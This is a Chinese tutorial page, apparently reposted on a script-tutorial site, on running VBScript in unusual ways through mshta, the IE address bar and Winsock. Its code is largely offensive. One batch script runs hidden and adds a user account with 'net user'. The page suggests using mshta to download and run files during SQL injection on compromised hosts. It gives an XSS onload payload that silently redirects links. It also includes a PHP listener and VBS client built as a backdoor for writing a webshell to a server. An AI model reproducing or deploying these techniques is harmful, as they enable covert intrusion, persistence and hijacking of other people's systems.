手机
当前位置:查字典教程网 >脚本专栏 >vbs >非常棒的lcx写的非常规运行vbs
非常棒的lcx写的非常规运行vbs
摘要:这个组件在xp、2003上默认都可以用的,调用后可以听到电脑上一个国外老男人在说话。好比这样一句代码:●CreateObject("SAPI...

这个组件在xp、2003上默认都可以用的,调用后可以听到电脑上一个国外老男人在说话。好比这样一句代码:●CreateObject("SAPI.SpVoice").Speak"ILOVEYOU"●,保存成vbs后缀后双击就会听到英语的我爱你了。但随之而来我们讲到另一个问题,不保存成vbs或vbe后缀如何运行vbs代码。

一、用mshta来运行vbs

hta这种类型的文件运行后也是系统权限,其调用宿主就是mshta.exe。我们在cmd下运行这样一行代码:●mshtavbscript:createobject("sapi.spvoice").speak("ILOVEYOU.")(window.close)●,也会听到同样的发音。这行代码的意思类似是临时生成一个hta文件,然后运行里边的vbs代码,再调用window.close将运行窗口关掉。整个运行过程是看不到hta窗口的。这种运行方式你会想到什么?最少我是想到了两个。一个是批处理的隐藏运行,基本代码如下:

@echooff

if"%1"=="h"gotobegin

mshtavbscript:createobject("wscript.shell").run("%~nx0h",0)(window.close)&&exit

:begin

rem下边开始写批处代码了

netuserlcx12345/add

这个代码只能双击运行,运行过程中你看不到具体的批处理运行流程的。第二个我想的是注射过程中的用途。网上有篇流传很广的文章《mssql注射中多次调用参数导致多次echo的解决方法》,中心思想是将vbs语句用冒号连接起来然后用echo命令一次写入到被注入的肉鸡上,然后再调用这个vbs来下载文件。如果调用mshta执行的话,下载、执行一次就ok了。不过在命令行下用mshta后边直接跟vbs代码有个难处理的问题是空格,不过这个好解决用execute将vbs代码放在括号里就ok了,这个读者可以亲自去试一下了,相信我不难的。

二、用ie地址栏运行vbs

很多人会用ie地址栏运行js,其实vbs一样是可以的,我们随便打开一个网站,在地址栏上输入:vbscript:msgbox(Document.links.length)后回车,就会看到当前页面有多少个连接了。用document.links(i).href这句的话,将i换成不同的自然数好比0、1、2、3等就会分别显示出不同的链接地址。这部份内容其实是涉及到dhtml的内容了。我们来看一个最简单的示例代码:

<ahref=http://www.sohu.com>www.sohu.com</a>

<ahref=http://www.baidu.com>www.baidu.com</a>

这是两个链接,保存成网页后点击就会跳转到不同的页面。如果这个页面有跨站,我想搞下破坏,让用户点击www.sohu.com却跑到我指定的页面上能做到吗?其实可以的,只要加一行语句就可以了,代码是:●<bodyonload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>●。这样的话用户再点击sohu其实会跑到google上去了,原来页面的版式却丝毫没有破坏。同样的dhtml元素还有document.links(i).href、document.images(i).src、document.forms(i).action等等,跨站改变其动态元素是很好玩的。

三、调用外部组件来运行vbs

vbs本身功能毕竟有限,但是却可以很好的与外部交互。要是用vbs来模拟nc发包的话,就要调用vb组件了。关于VBS如何成功调用MSWinsock.Winsock,zzzevazzz说的很清楚了。就是下载Winsock.ocs注册,和VB6控件的授权密钥的.reg导入注册表。两个文件可以在http://zzzevazzz.bokee.com/inc/vb6controls.rar这里下载。前不久学了一段时间php,网上看到一个php的监听程序,可以用它来做一个后门,s端s.php代码如下:

<?

//设置一些基本的变量

$host="192.168.8.100";

$port=12345;

//设置超时时间

set_time_limit(0);

//创建一个Socket

$socket=socket_create(AF_INET,SOCK_STREAM,0)ordie("Couldnotcreate

socketn");

//绑定Socket到端口

$result=socket_bind($socket,$host,$port)ordie("Couldnotbindto

socketn");

//开始监听链接

$result=socket_listen($socket,3)ordie("Couldnotsetupsocket

listenern");

//acceptincomingconnections

//另一个Socket来处理通信

$spawn=socket_accept($socket)ordie("Couldnotacceptincoming

connectionn");

//获得客户端的输入

$input=socket_read($spawn,1024)ordie("Couldnotreadinputn");

//清空输入字符串

$input=trim($input);//将输入结果写入ok.php,这句是我加的

fputs(fopen('ok.php','a+'),"$input");

//处理客户端输入并返回结果

$output=strrev($input)."n";

socket_write($spawn,$output,strlen($output))ordie("Couldnotwrite

outputn");

//关闭sockets

socket_close($spawn);

socket_close($socket);

?>

在ie打开这个php,运行它的服务器会监听12345端口。如果我们再用vbs向12345端口发包的话,在同文件的php目录下会生成ok.php。发包的内容就是我们要写入ok.php的代码。该vbs文件c.vbs代码如下:

Setie=WScript.CreateObject("InternetExplorer.Application")

ie.visible=false

ie.Navigate"http://192.168.8.100/s.php"'s.php是服务端

Whileie.Busy

WScript.Sleep100

Wend

Do

Wscript.Sleep200

LoopUntilie.ReadyState=4

Setsocket=WScript.CreateObject("MSWinsock.Winsock")

socket.Protocol=0

socket.RemotePort="12345"'端口

socket.RemoteHost="192.168.8.100"'主机

socket.connectsocket.RemoteHost,socket.RemotePort'连接

WScript.sleep10

ddd="<?phpinfo();>"&Chr(13)'这里你可以改成一句话的php木马

socket.SendDataddd

WScript.sleep100

wscript.echo"ok"

'socket.senddataChr(13)

socket.close

Setie=nothing

一个vbs和一个php珠联璧合,打造了一个非常规后门。当然这个后门的价值不大,但重要的是思路,不是吗?

【非常棒的lcx写的非常规运行vbs】相关文章:

VBScript的入门学习资料

定时自动备份IIS的WWW日志的vbs脚本

用vbs实现删除名称中有撇号的文件夹

实用vbs提醒小程序

VBS教程:函数-Split 函数

VBS教程:VBScript 基础-VBScript编码约定

VBS脚本也有GUI图形界面 日志清除功能

vbs的sort排序

VBS教程:正则表达式简介 -正则表达式语法

获取屏幕分辨率的VBS代码

精品推荐
分类导航